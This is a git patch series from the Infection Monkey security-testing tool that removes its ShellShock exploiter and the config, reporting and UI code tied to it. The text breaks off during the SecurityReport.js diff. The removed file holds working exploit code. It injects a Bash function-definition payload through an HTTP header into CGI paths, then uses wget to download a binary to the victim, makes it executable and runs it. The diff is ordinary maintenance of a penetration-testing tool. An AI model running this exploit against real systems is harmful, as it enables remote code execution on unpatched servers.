From 64b900b94d22e275df5cdec8ad3ec0904e44b343 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Wed, 23 Feb 2022 13:26:25 +0100 Subject: [PATCH 1/7] Agent: Remove ShellShock exploiter --- monkey/infection_monkey/example.conf | 1 - monkey/infection_monkey/exploit/shellshock.py | 269 ------------ .../exploit/shellshock_resources.py | 408 ------------------ 3 files changed, 678 deletions(-) delete mode 100644 monkey/infection_monkey/exploit/shellshock.py delete mode 100644 monkey/infection_monkey/exploit/shellshock_resources.py diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf index a0bf5f414..efb9a4350 100644 --- a/monkey/infection_monkey/example.conf +++ b/monkey/infection_monkey/example.conf @@ -27,7 +27,6 @@ "SSHExploiter", "SmbExploiter", "WmiExploiter", - "ShellShockExploiter", "ElasticGroovyExploiter", "Struts2Exploiter", "WebLogicExploiter", diff --git a/monkey/infection_monkey/exploit/shellshock.py b/monkey/infection_monkey/exploit/shellshock.py deleted file mode 100644 index f76739e1d..000000000 --- a/monkey/infection_monkey/exploit/shellshock.py +++ /dev/null @@ -1,269 +0,0 @@ -# Implementation is based on shellshock script provided -# https://github.com/nccgroup/shocker/blob/master/shocker.py - -import logging -import string -from random import SystemRandom - -import requests - -from common.utils.attack_utils import ScanStatus -from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.shellshock_resources import CGI_FILES -from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey -from infection_monkey.exploit.tools.http_tools import HTTPTools -from infection_monkey.model import DROPPER_ARG -from infection_monkey.telemetry.attack.t1222_telem import T1222Telem -from infection_monkey.utils.commands import build_monkey_commandline - -logger = logging.getLogger(__name__) -TIMEOUT = 2 -TEST_COMMAND = "/bin/uname -a" -DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder -LOCK_HELPER_FILE = "/tmp/monkey_shellshock" - - -class ShellShockExploiter(HostExploiter): - _attacks = {"Content-type": "() { :;}; echo; "} - - _TARGET_OS_TYPE = ["linux"] - _EXPLOITED_SERVICE = "Bash" - - def __init__(self, host): - super(ShellShockExploiter, self).__init__(host) - self.HTTP = [str(port) for port in self._config.HTTP_PORTS] - safe_random = SystemRandom() - self.success_flag = "".join( - safe_random.choice(string.ascii_uppercase + string.digits) for _ in range(20) - ) - - def _exploit_host(self): - # start by picking ports - candidate_services = { - service: self.host.services[service] - for service in self.host.services - if ("name" in self.host.services[service]) - and (self.host.services[service]["name"] == "http") - } - - valid_ports = [ - (port, candidate_services["tcp-" + str(port)]["data"][1]) - for port in self.HTTP - if "tcp-" + str(port) in candidate_services - ] - http_ports = [port[0] for port in valid_ports if not port[1]] - https_ports = [port[0] for port in valid_ports if port[1]] - - logger.info( - "Scanning %s, ports [%s] for vulnerable CGI pages" - % (self.host, ",".join([str(port[0]) for port in valid_ports])) - ) - - attackable_urls = [] - # now for each port we want to check the entire URL list - for port in http_ports: - urls = self.check_urls(self.host.ip_addr, port) - attackable_urls.extend(urls) - for port in https_ports: - urls = self.check_urls(self.host.ip_addr, port, is_https=True) - attackable_urls.extend(urls) - # now for each URl we want to try and see if it's attackable - exploitable_urls = [self.attempt_exploit(url) for url in attackable_urls] - exploitable_urls = [url for url in exploitable_urls if url[0] is True] - - # we want to report all vulnerable URLs even if we didn't succeed - self.exploit_info["vulnerable_urls"] = [url[1] for url in exploitable_urls] - - # now try URLs until we install something on victim - for _, url, header, exploit in exploitable_urls: - logger.info("Trying to attack host %s with %s URL" % (self.host, url)) - # same attack script as sshexec - # for any failure, quit and don't try other URLs - if not self.host.os.get("type"): - try: - uname_os_attack = exploit + "/bin/uname -o" - uname_os = self.attack_page(url, header, uname_os_attack) - if "linux" in uname_os: - self.host.os["type"] = "linux" - else: - logger.info("SSH Skipping unknown os: %s", uname_os) - return False - except Exception as exc: - logger.debug( - "Error running uname os command on victim %r: (%s)", self.host, exc - ) - return False - if not self.host.os.get("machine"): - try: - uname_machine_attack = exploit + "/bin/uname -m" - uname_machine = self.attack_page(url, header, uname_machine_attack) - if "" != uname_machine: - self.host.os["machine"] = uname_machine.lower().strip() - except Exception as exc: - logger.debug( - "Error running uname machine command on victim %r: (%s)", self.host, exc - ) - return False - - # copy the monkey - dropper_target_path_linux = self._config.dropper_target_path_linux - - src_path = get_target_monkey(self.host) - if not src_path: - logger.info("Can't find suitable monkey executable for host %r", self.host) - return False - - if not self._create_lock_file(exploit, url, header): - logger.info("Another monkey is running shellshock exploit") - return True - - http_path, http_thread = HTTPTools.create_transfer(self.host, src_path) - - if not http_path: - logger.debug("Exploiter ShellShock failed, http transfer creation failed.") - return False - - download_command = "/usr/bin/wget %s -O %s;" % (http_path, dropper_target_path_linux) - - download = exploit + download_command - self.attack_page( - url, header, download - ) # we ignore failures here since it might take more than TIMEOUT time - - http_thread.join(DOWNLOAD_TIMEOUT) - http_thread.stop() - - self._remove_lock_file(exploit, url, header) - - if (http_thread.downloads != 1) or ( - "ELF" - not in self.check_remote_file_exists( - url, header, exploit, dropper_target_path_linux - ) - ): - logger.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) - continue - - # turn the monkey into an executable - chmod = "/bin/chmod +x %s" % dropper_target_path_linux - run_path = exploit + chmod - self.attack_page(url, header, run_path) - T1222Telem(ScanStatus.USED, chmod, self.host).send() - - # run the monkey - cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG) - cmdline += build_monkey_commandline( - self.host, - get_monkey_depth() - 1, - dropper_target_path_linux, - ) - cmdline += " & " - run_path = exploit + cmdline - self.attack_page(url, header, run_path) - - logger.info( - "Executed monkey '%s' on remote victim %r (cmdline=%r)", - self._config.dropper_target_path_linux, - self.host, - cmdline, - ) - - if not ( - self.check_remote_file_exists( - url, header, exploit, self._config.monkey_log_path_linux - ) - ): - logger.info("Log file does not exist, monkey might not have run") - continue - self.add_executed_cmd(cmdline) - return True - - return False - - @classmethod - def check_remote_file_exists(cls, url, header, exploit, file_path): - """ - Checks if a remote file exists and returns the content if so - file_path should be fully qualified - """ - cmdline = "/usr/bin/head -c 4 %s" % file_path - run_path = exploit + cmdline - resp = cls.attack_page(url, header, run_path) - if resp: - logger.info("File %s exists on remote host" % file_path) - return resp - - def attempt_exploit(self, url, attacks=None): - # Flag used to identify whether the exploit has successfully caused the - # server to return a useful response - - if not attacks: - attacks = self._attacks - - logger.debug("Attack Flag is: %s" % self.success_flag) - - logger.debug("Trying exploit for %s" % url) - for header, exploit in list(attacks.items()): - attack = exploit + " echo " + self.success_flag + "; " + TEST_COMMAND - result = self.attack_page(url, header, attack) - if self.success_flag in result: - logger.info("URL %s looks vulnerable" % url) - return True, url, header, exploit - else: - logger.debug("URL %s does not seem to be vulnerable with %s header" % (url, header)) - return (False,) - - def _create_lock_file(self, exploit, url, header): - if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE): - return False - cmd = exploit + "echo AAAA > %s" % LOCK_HELPER_FILE - self.attack_page(url, header, cmd) - return True - - def _remove_lock_file(self, exploit, url, header): - cmd = exploit + "rm %s" % LOCK_HELPER_FILE - self.attack_page(url, header, cmd) - - @staticmethod - def attack_page(url, header, attack): - result = "" - try: - logger.debug("Header is: %s" % header) - logger.debug("Attack is: %s" % attack) - r = requests.get( # noqa: DUO123 - url, headers={header: attack}, verify=False, timeout=TIMEOUT - ) - result = r.content.decode() - return result - except requests.exceptions.RequestException as exc: - logger.debug("Failed to run, exception %s" % exc) - return result - - @staticmethod - def check_urls(host, port, is_https=False, url_list=CGI_FILES): - """ - Checks if which urls exist - :return: Sequence of URLs to try and attack - """ - attack_path = "http://" - if is_https: - attack_path = "https://" - attack_path = attack_path + str(host) + ":" + str(port) - reqs = [] - timeout = False - attack_urls = [attack_path + url for url in url_list] - for u in attack_urls: - try: - reqs.append(requests.head(u, verify=False, timeout=TIMEOUT)) # noqa: DUO123 - except requests.Timeout: - timeout = True - break - if timeout: - logger.debug( - "Some connections timed out while sending request to potentially vulnerable " - "urls." - ) - valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok] - urls = [resp.url for resp in valid_resps] - - return urls diff --git a/monkey/infection_monkey/exploit/shellshock_resources.py b/monkey/infection_monkey/exploit/shellshock_resources.py deleted file mode 100644 index 3a128b23e..000000000 --- a/monkey/infection_monkey/exploit/shellshock_resources.py +++ /dev/null @@ -1,408 +0,0 @@ -# resource for shellshock attack -# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list - -CGI_FILES = ( - r"/", - r"/admin.cgi", - r"/administrator.cgi", - r"/agora.cgi", - r"/aktivate/cgi-bin/catgy.cgi", - r"/analyse.cgi", - r"/apps/web/vs_diag.cgi", - r"/axis-cgi/buffer/command.cgi", - r"/b2-include/b2edit.showposts.php", - r"/bandwidth/index.cgi", - r"/bigconf.cgi", - r"/cartcart.cgi", - r"/cart.cgi", - r"/ccbill/whereami.cgi", - r"/cgi-bin/14all-1.1.cgi", - r"/cgi-bin/14all.cgi", - r"/cgi-bin/a1disp3.cgi", - r"/cgi-bin/a1stats/a1disp3.cgi", - r"/cgi-bin/a1stats/a1disp4.cgi", - r"/cgi-bin/addbanner.cgi", - r"/cgi-bin/add_ftp.cgi", - r"/cgi-bin/adduser.cgi", - r"/cgi-bin/admin/admin.cgi", - r"/cgi-bin/admin.cgi", - r"/cgi-bin/admin/getparam.cgi", - r"/cgi-bin/adminhot.cgi", - r"/cgi-bin/admin.pl", - r"/cgi-bin/admin/setup.cgi", - r"/cgi-bin/adminwww.cgi", - r"/cgi-bin/af.cgi", - r"/cgi-bin/aglimpse.cgi", - r"/cgi-bin/alienform.cgi", - r"/cgi-bin/AnyBoard.cgi", - r"/cgi-bin/architext_query.cgi", - r"/cgi-bin/astrocam.cgi", - r"/cgi-bin/AT-admin.cgi", - r"/cgi-bin/AT-generate.cgi", - r"/cgi-bin/auction/auction.cgi", - r"/cgi-bin/auktion.cgi", - r"/cgi-bin/ax-admin.cgi", - r"/cgi-bin/ax.cgi", - r"/cgi-bin/axs.cgi", - r"/cgi-bin/badmin.cgi", - r"/cgi-bin/banner.cgi", - r"/cgi-bin/bannereditor.cgi", - r"/cgi-bin/bb-ack.sh", - r"/cgi-bin/bb-histlog.sh", - r"/cgi-bin/bb-hist.sh", - r"/cgi-bin/bb-hostsvc.sh", - r"/cgi-bin/bb-replog.sh", - r"/cgi-bin/bb-rep.sh", - r"/cgi-bin/bbs_forum.cgi", - r"/cgi-bin/bigconf.cgi", - r"/cgi-bin/bizdb1-search.cgi", - r"/cgi-bin/blog/mt-check.cgi", - r"/cgi-bin/blog/mt-load.cgi", - r"/cgi-bin/bnbform.cgi", - r"/cgi-bin/book.cgi", - r"/cgi-bin/boozt/admin/index.cgi", - r"/cgi-bin/bsguest.cgi", - r"/cgi-bin/bslist.cgi", - r"/cgi-bin/build.cgi", - r"/cgi-bin/bulk/bulk.cgi", - r"/cgi-bin/cached_feed.cgi", - r"/cgi-bin/cachemgr.cgi", - r"/cgi-bin/calendar/index.cgi", - r"/cgi-bin/cartmanager.cgi", - r"/cgi-bin/cbmc/forums.cgi", - r"/cgi-bin/ccvsblame.cgi", - r"/cgi-bin/c_download.cgi", - r"/cgi-bin/cgforum.cgi", - r"/cgi-bin/.cgi", - r"/cgi-bin/cgi_process", - r"/cgi-bin/classified.cgi", - r"/cgi-bin/classifieds.cgi", - r"/cgi-bin/classifieds/classifieds.cgi", - r"/cgi-bin/classifieds/index.cgi", - r"/cgi-bin/.cobalt/alert/service.cgi", - r"/cgi-bin/.cobalt/message/message.cgi", - r"/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi", - r"/cgi-bin/commandit.cgi", - r"/cgi-bin/commerce.cgi", - r"/cgi-bin/common/listrec.pl", - r"/cgi-bin/compatible.cgi", - r"/cgi-bin/Count.cgi", - r"/cgi-bin/csChatRBox.cgi", - r"/cgi-bin/csGuestBook.cgi", - r"/cgi-bin/csLiveSupport.cgi", - r"/cgi-bin/CSMailto.cgi", - r"/cgi-bin/CSMailto/CSMailto.cgi", - r"/cgi-bin/csNews.cgi", - r"/cgi-bin/csNewsPro.cgi", - r"/cgi-bin/csPassword.cgi", - r"/cgi-bin/csPassword/csPassword.cgi", - r"/cgi-bin/csSearch.cgi", - r"/cgi-bin/csv_db.cgi", - r"/cgi-bin/cvsblame.cgi", - r"/cgi-bin/cvslog.cgi", - r"/cgi-bin/cvsquery.cgi", - r"/cgi-bin/cvsqueryform.cgi", - r"/cgi-bin/day5datacopier.cgi", - r"/cgi-bin/day5datanotifier.cgi", - r"/cgi-bin/db_manager.cgi", - r"/cgi-bin/dbman/db.cgi", - r"/cgi-bin/dcforum.cgi", - r"/cgi-bin/dcshop.cgi", - r"/cgi-bin/dfire.cgi", - r"/cgi-bin/diagnose.cgi", - r"/cgi-bin/dig.cgi", - r"/cgi-bin/directorypro.cgi", - r"/cgi-bin/download.cgi", - r"/cgi-bin/e87_Ba79yo87.cgi", - r"/cgi-bin/emu/html/emumail.cgi", - r"/cgi-bin/emumail.cgi", - r"/cgi-bin/emumail/emumail.cgi", - r"/cgi-bin/enter.cgi", - r"/cgi-bin/environ.cgi", - r"/cgi-bin/ezadmin.cgi", - r"/cgi-bin/ezboard.cgi", - r"/cgi-bin/ezman.cgi", - r"/cgi-bin/ezshopper2/loadpage.cgi", - r"/cgi-bin/ezshopper3/loadpage.cgi", - r"/cgi-bin/ezshopper/loadpage.cgi", - r"/cgi-bin/ezshopper/search.cgi", - r"/cgi-bin/faqmanager.cgi", - r"/cgi-bin/FileSeek2.cgi", - r"/cgi-bin/FileSeek.cgi", - r"/cgi-bin/finger.cgi", - r"/cgi-bin/flexform.cgi", - r"/cgi-bin/fom.cgi", - r"/cgi-bin/fom/fom.cgi", - r"/cgi-bin/FormHandler.cgi", - r"/cgi-bin/FormMail.cgi", - r"/cgi-bin/gbadmin.cgi", - r"/cgi-bin/gbook/gbook.cgi", - r"/cgi-bin/generate.cgi", - r"/cgi-bin/getdoc.cgi", - r"/cgi-bin/gH.cgi", - r"/cgi-bin/gm-authors.cgi", - r"/cgi-bin/gm.cgi", - r"/cgi-bin/gm-cplog.cgi", - r"/cgi-bin/guestbook.cgi", - r"/cgi-bin/handler", - r"/cgi-bin/handler.cgi", - r"/cgi-bin/handler/netsonar", - r"/cgi-bin/hitview.cgi", - r"/cgi-bin/hsx.cgi", - r"/cgi-bin/html2chtml.cgi", - r"/cgi-bin/html2wml.cgi", - r"/cgi-bin/htsearch.cgi", - r"/cgi-bin/hw.sh", # testing - r"/cgi-bin/icat", - r"/cgi-bin/if/admin/nph-build.cgi", - r"/cgi-bin/ikonboard/help.cgi", - r"/cgi-bin/ImageFolio/admin/admin.cgi", - r"/cgi-bin/imageFolio.cgi", - r"/cgi-bin/index.cgi", - r"/cgi-bin/infosrch.cgi", - r"/cgi-bin/jammail.pl", - r"/cgi-bin/journal.cgi", - r"/cgi-bin/lastlines.cgi", - r"/cgi-bin/loadpage.cgi", - r"/cgi-bin/login.cgi", - r"/cgi-bin/logit.cgi", - r"/cgi-bin/log-reader.cgi", - r"/cgi-bin/lookwho.cgi", - r"/cgi-bin/lwgate.cgi", - r"/cgi-bin/MachineInfo", - r"/cgi-bin/MachineInfo", - r"/cgi-bin/magiccard.cgi", - r"/cgi-bin/mail/emumail.cgi", - r"/cgi-bin/maillist.cgi", - r"/cgi-bin/mailnews.cgi", - r"/cgi-bin/mail/nph-mr.cgi", - r"/cgi-bin/main.cgi", - r"/cgi-bin/main_menu.pl", - r"/cgi-bin/man.sh", - r"/cgi-bin/mini_logger.cgi", - r"/cgi-bin/mmstdod.cgi", - r"/cgi-bin/moin.cgi", - r"/cgi-bin/mojo/mojo.cgi", - r"/cgi-bin/mrtg.cgi", - r"/cgi-bin/mt.cgi", - r"/cgi-bin/mt/mt.cgi", - r"/cgi-bin/mt/mt-check.cgi", - r"/cgi-bin/mt/mt-load.cgi", - r"/cgi-bin/mt-static/mt-check.cgi", - r"/cgi-bin/mt-static/mt-load.cgi", - r"/cgi-bin/musicqueue.cgi", - r"/cgi-bin/myguestbook.cgi", - r"/cgi-bin/.namazu.cgi", - r"/cgi-bin/nbmember.cgi", - r"/cgi-bin/netauth.cgi", - r"/cgi-bin/netpad.cgi", - r"/cgi-bin/newsdesk.cgi", - r"/cgi-bin/nlog-smb.cgi", - r"/cgi-bin/nph-emumail.cgi", - r"/cgi-bin/nph-exploitscanget.cgi", - r"/cgi-bin/nph-publish.cgi", - r"/cgi-bin/nph-test.cgi", - r"/cgi-bin/pagelog.cgi", - r"/cgi-bin/pbcgi.cgi", - r"/cgi-bin/perlshop.cgi", - r"/cgi-bin/pfdispaly.cgi", - r"/cgi-bin/pfdisplay.cgi", - r"/cgi-bin/phf.cgi", - r"/cgi-bin/photo/manage.cgi", - r"/cgi-bin/photo/protected/manage.cgi", - r"/cgi-bin/php-cgi", - r"/cgi-bin/php.cgi", - r"/cgi-bin/php.fcgi", - r"/cgi-bin/ping.sh", - r"/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi", - r"/cgi-bin/pollssi.cgi", - r"/cgi-bin/postcards.cgi", - r"/cgi-bin/powerup/r.cgi", - r"/cgi-bin/printenv", - r"/cgi-bin/probecontrol.cgi", - r"/cgi-bin/profile.cgi", - r"/cgi-bin/publisher/search.cgi", - r"/cgi-bin/quickstore.cgi", - r"/cgi-bin/quizme.cgi", - r"/cgi-bin/ratlog.cgi", - r"/cgi-bin/r.cgi", - r"/cgi-bin/register.cgi", - r"/cgi-bin/replicator/webpage.cgi/", - r"/cgi-bin/responder.cgi", - r"/cgi-bin/robadmin.cgi", - r"/cgi-bin/robpoll.cgi", - r"/cgi-bin/rtpd.cgi", - r"/cgi-bin/sbcgi/sitebuilder.cgi", - r"/cgi-bin/scoadminreg.cgi", - r"/cgi-bin-sdb/printenv", - r"/cgi-bin/sdbsearch.cgi", - r"/cgi-bin/search", - r"/cgi-bin/search.cgi", - r"/cgi-bin/search/search.cgi", - r"/cgi-bin/sendform.cgi", - r"/cgi-bin/shop.cgi", - r"/cgi-bin/shopper.cgi", - r"/cgi-bin/shopplus.cgi", - r"/cgi-bin/showcheckins.cgi", - r"/cgi-bin/simplestguest.cgi", - r"/cgi-bin/simplestmail.cgi", - r"/cgi-bin/smartsearch.cgi", - r"/cgi-bin/smartsearch/smartsearch.cgi", - r"/cgi-bin/snorkerz.bat", - r"/cgi-bin/snorkerz.bat", - r"/cgi-bin/snorkerz.cmd", - r"/cgi-bin/snorkerz.cmd", - r"/cgi-bin/sojourn.cgi", - r"/cgi-bin/spin_client.cgi", - r"/cgi-bin/start.cgi", - r"/cgi-bin/status", - r"/cgi-bin/status_cgi", - r"/cgi-bin/store/agora.cgi", - r"/cgi-bin/store.cgi", - r"/cgi-bin/store/index.cgi", - r"/cgi-bin/survey.cgi", - r"/cgi-bin/sync.cgi", - r"/cgi-bin/talkback.cgi", - r"/cgi-bin/technote/main.cgi", - r"/cgi-bin/test2.pl", - r"/cgi-bin/test-cgi", - r"/cgi-bin/test.cgi", - r"/cgi-bin/testing_whatever", - r"/cgi-bin/test/test.cgi", - r"/cgi-bin/tidfinder.cgi", - r"/cgi-bin/tigvote.cgi", - r"/cgi-bin/title.cgi", - r"/cgi-bin/top.cgi", - r"/cgi-bin/traffic.cgi", - r"/cgi-bin/troops.cgi", - r"/cgi-bin/ttawebtop.cgi/", - r"/cgi-bin/ultraboard.cgi", - r"/cgi-bin/upload.cgi", - r"/cgi-bin/urlcount.cgi", - r"/cgi-bin/viewcvs.cgi", - r"/cgi-bin/view_help.cgi", - r"/cgi-bin/viralator.cgi", - r"/cgi-bin/virgil.cgi", - r"/cgi-bin/vote.cgi", - r"/cgi-bin/vpasswd.cgi", - r"/cgi-bin/way-board.cgi", - r"/cgi-bin/way-board/way-board.cgi", - r"/cgi-bin/webbbs.cgi", - r"/cgi-bin/webcart/webcart.cgi", - r"/cgi-bin/webdist.cgi", - r"/cgi-bin/webif.cgi", - r"/cgi-bin/webmail/html/emumail.cgi", - r"/cgi-bin/webmap.cgi", - r"/cgi-bin/webspirs.cgi", - r"/cgi-bin/Web_Store/web_store.cgi", - r"/cgi-bin/whois.cgi", - r"/cgi-bin/whois_raw.cgi", - r"/cgi-bin/whois/whois.cgi", - r"/cgi-bin/wrap", - r"/cgi-bin/wrap.cgi", - r"/cgi-bin/wwwboard.cgi.cgi", - r"/cgi-bin/YaBB/YaBB.cgi", - r"/cgi-bin/zml.cgi", - r"/cgi-mod/index.cgi", - r"/cgis/wwwboard/wwwboard.cgi", - r"/cgi-sys/addalink.cgi", - r"/cgi-sys/defaultwebpage.cgi", - r"/cgi-sys/domainredirect.cgi", - r"/cgi-sys/entropybanner.cgi", - r"/cgi-sys/entropysearch.cgi", - r"/cgi-sys/FormMail-clone.cgi", - r"/cgi-sys/helpdesk.cgi", - r"/cgi-sys/mchat.cgi", - r"/cgi-sys/randhtml.cgi", - r"/cgi-sys/realhelpdesk.cgi", - r"/cgi-sys/realsignup.cgi", - r"/cgi-sys/signup.cgi", - r"/connector.cgi", - r"/cp/rac/nsManager.cgi", - r"/create_release.sh", - r"/CSNews.cgi", - r"/csPassword.cgi", - r"/dcadmin.cgi", - r"/dcboard.cgi", - r"/dcforum.cgi", - r"/dcforum/dcforum.cgi", - r"/debuff.cgi", - r"/debug.cgi", - r"/details.cgi", - r"/edittag/edittag.cgi", - r"/emumail.cgi", - r"/enter_buff.cgi", - r"/enter_bug.cgi", - r"/ez2000/ezadmin.cgi", - r"/ez2000/ezboard.cgi", - r"/ez2000/ezman.cgi", - r"/fcgi-bin/echo", - r"/fcgi-bin/echo", - r"/fcgi-bin/echo2", - r"/fcgi-bin/echo2", - r"/Gozila.cgi", - r"/hitmatic/analyse.cgi", - r"/hp_docs/cgi-bin/index.cgi", - r"/html/cgi-bin/cgicso", - r"/html/cgi-bin/cgicso", - r"/index.cgi", - r"/info.cgi", - r"/infosrch.cgi", - r"/login.cgi", - r"/mailview.cgi", - r"/main.cgi", - r"/megabook/admin.cgi", - r"/ministats/admin.cgi", - r"/mods/apage/apage.cgi", - r"/_mt/mt.cgi", - r"/musicqueue.cgi", - r"/ncbook.cgi", - r"/newpro.cgi", - r"/newsletter.sh", - r"/oem_webstage/cgi-bin/oemapp_cgi", - r"/page.cgi", - r"/parse_xml.cgi", - r"/photodata/manage.cgi", - r"/photo/manage.cgi", - r"/print.cgi", - r"/process_buff.cgi", - r"/process_bug.cgi", - r"/pub/english.cgi", - r"/quikmail/nph-emumail.cgi", - r"/quikstore.cgi", - r"/reviews/newpro.cgi", - r"/ROADS/cgi-bin/search.pl", - r"/sample01.cgi", - r"/sample02.cgi", - r"/sample03.cgi", - r"/sample04.cgi", - r"/sampleposteddata.cgi", - r"/scancfg.cgi", - r"/scancfg.cgi", - r"/servers/link.cgi", - r"/setpasswd.cgi", - r"/SetSecurity.shm", - r"/shop/member_html.cgi", - r"/shop/normal_html.cgi", - r"/site_searcher.cgi", - r"/siteUserMod.cgi", - r"/submit.cgi", - r"/technote/print.cgi", - r"/template.cgi", - r"/test.cgi", - r"/ucsm/isSamInstalled.cgi", - r"/upload.cgi", - r"/userreg.cgi", - r"/users/scripts/submit.cgi", - r"/vood/cgi-bin/vood_view.cgi", - r"/Web_Store/web_store.cgi", - r"/webtools/bonsai/ccvsblame.cgi", - r"/webtools/bonsai/cvsblame.cgi", - r"/webtools/bonsai/cvslog.cgi", - r"/webtools/bonsai/cvsquery.cgi", - r"/webtools/bonsai/cvsqueryform.cgi", - r"/webtools/bonsai/showcheckins.cgi", - r"/wwwadmin.cgi", - r"/wwwboard.cgi", - r"/wwwboard/wwwboard.cgi", -) From 60d16ea4d66b067db0b6b8cb67be67bbf0ed4dab Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Wed, 23 Feb 2022 13:27:59 +0100 Subject: [PATCH 2/7] Island: Remove ShellShock Exploiter --- .../cc/services/config_schema/basic.py | 1 - .../definitions/exploiter_classes.py | 10 ------- .../cc/services/reporting/aws_exporter.py | 18 ----------- .../exploiter_descriptor_enum.py | 6 ---- .../processors/shellshock_exploit.py | 15 ---------- .../report-components/SecurityReport.js | 6 ---- .../security/issues/ShellShockIssue.js | 30 ------------------- 7 files changed, 86 deletions(-) delete mode 100644 monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py delete mode 100644 monkey/monkey_island/cc/ui/src/components/report-components/security/issues/ShellShockIssue.js diff --git a/monkey/monkey_island/cc/services/config_schema/basic.py b/monkey/monkey_island/cc/services/config_schema/basic.py index 9151ff259..0f841e968 100644 --- a/monkey/monkey_island/cc/services/config_schema/basic.py +++ b/monkey/monkey_island/cc/services/config_schema/basic.py @@ -18,7 +18,6 @@ BASIC = { "WmiExploiter", "SSHExploiter", "Log4ShellExploiter", - "ShellShockExploiter", "ElasticGroovyExploiter", "Struts2Exploiter", "WebLogicExploiter", diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py index f21bc942d..e9a5ac5ea 100644 --- a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py +++ b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py @@ -53,16 +53,6 @@ EXPLOITER_CLASSES = { "link": "https://www.guardicore.com/infectionmonkey/docs/reference" "/exploiters/sshexec/", }, - { - "type": "string", - "enum": ["ShellShockExploiter"], - "title": "ShellShock Exploiter", - "safe": True, - "info": "CVE-2014-6271, based on logic from " - "https://github.com/nccgroup/shocker/blob/master/shocker.py .", - "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters" - "/shellshock/", - }, { "type": "string", "enum": ["ElasticGroovyExploiter"], diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py index 927685560..00d738b07 100644 --- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py +++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py @@ -68,7 +68,6 @@ class AWSExporter(Exporter): CredentialType.PASSWORD.value: AWSExporter._handle_ssh_issue, CredentialType.KEY.value: AWSExporter._handle_ssh_key_issue, }, - ExploiterDescriptorEnum.SHELLSHOCK.value.class_name: AWSExporter._handle_shellshock_issue, # noqa:E501 "tunnel": AWSExporter._handle_tunnel_issue, ExploiterDescriptorEnum.ELASTIC.value.class_name: AWSExporter._handle_elastic_issue, ExploiterDescriptorEnum.SMB.value.class_name: { @@ -295,23 +294,6 @@ class AWSExporter(Exporter): instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) - @staticmethod - def _handle_shellshock_issue(issue, instance_arn): - - return AWSExporter._build_generic_finding( - severity=10, - title="Machines are vulnerable to 'Shellshock'", - description="Update your Bash to a ShellShock-patched version.", - recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. " - "The attack was made possible because the HTTP server running on " - "TCP port {2} was vulnerable to a " - "shell injection attack on the paths: {3}.".format( - issue["machine"], issue["ip_address"], issue["port"], issue["paths"] - ), - instance_arn=instance_arn, - instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, - ) - @staticmethod def _handle_smb_password_issue(issue, instance_arn): diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py index 1555b4b61..91855329e 100644 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py +++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py @@ -11,9 +11,6 @@ from monkey_island.cc.services.reporting.issue_processing.exploit_processing.pro from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.log4shell import ( # noqa: E501 Log4ShellProcessor, ) -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.shellshock_exploit import ( # noqa: E501 - ShellShockExploitProcessor, -) from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.zerologon import ( # noqa: E501 ZerologonExploitProcessor, ) @@ -34,9 +31,6 @@ class ExploiterDescriptorEnum(Enum): ELASTIC = ExploiterDescriptor( "ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor ) - SHELLSHOCK = ExploiterDescriptor( - "ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor - ) STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor) WEBLOGIC = ExploiterDescriptor( "WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py deleted file mode 100644 index bd047fbf5..000000000 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py +++ /dev/null @@ -1,15 +0,0 @@ -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ( # noqa: E501 - ExploiterReportInfo, - ExploitProcessor, -) - - -class ShellShockExploitProcessor: - @staticmethod - def get_exploit_info_by_dict(class_name: str, exploit_dict: dict) -> ExploiterReportInfo: - exploit_info = ExploitProcessor.get_exploit_info_by_dict(class_name, exploit_dict) - - urls = exploit_dict["data"]["info"]["vulnerable_urls"] - exploit_info.port = urls[0].split(":")[2].split("/")[0] - exploit_info.paths = ["/" + url.split(":")[2].split("/")[1] for url in urls] - return exploit_info diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js 